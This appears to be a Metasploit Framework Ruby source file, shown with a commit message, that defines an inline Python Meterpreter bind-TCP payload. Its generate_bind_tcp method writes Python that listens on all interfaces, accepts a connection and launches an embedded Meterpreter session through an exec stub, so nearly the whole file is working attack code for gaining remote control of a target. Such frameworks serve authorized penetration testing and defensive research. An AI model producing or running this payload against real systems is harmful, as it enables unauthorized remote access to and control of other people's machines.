llamasoft
1a353ee273
While the length of the input payload is always the same size, it may not always have the same contents due to random checksum URI and UUID generation. This leads to payloads whose sizes can vary by a few bytes between runs.
41 lines
1.2 KiB
Ruby
41 lines
1.2 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
|
|
module MetasploitModule
|
|
|
|
CachedSize = :dynamic
|
|
|
|
include Msf::Payload::Single
|
|
include Msf::Payload::Python
|
|
include Msf::Payload::Python::BindTcp
|
|
include Msf::Payload::Python::MeterpreterLoader
|
|
|
|
def initialize(info = {})
|
|
super(merge_info(info,
|
|
'Name' => 'Python Meterpreter Shell, Bind TCP Inline',
|
|
'Description' => 'Connect to the victim and spawn a Meterpreter shell',
|
|
'Author' => 'Spencer McIntyre',
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => 'python',
|
|
'Arch' => ARCH_PYTHON,
|
|
'Handler' => Msf::Handler::BindTcp,
|
|
'Session' => Msf::Sessions::Meterpreter_Python_Python
|
|
))
|
|
end
|
|
|
|
def generate_bind_tcp(opts={})
|
|
socket_setup = "bind_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
|
|
socket_setup << "bind_sock.bind(('0.0.0.0', #{opts[:port]}))\n"
|
|
socket_setup << "bind_sock.listen(1)\n"
|
|
socket_setup << "s, address = bind_sock.accept()\n"
|
|
opts[:stageless_tcp_socket_setup] = socket_setup
|
|
opts[:stageless] = true
|
|
|
|
met = stage_meterpreter(opts)
|
|
py_create_exec_stub(met)
|
|
end
|
|
end
|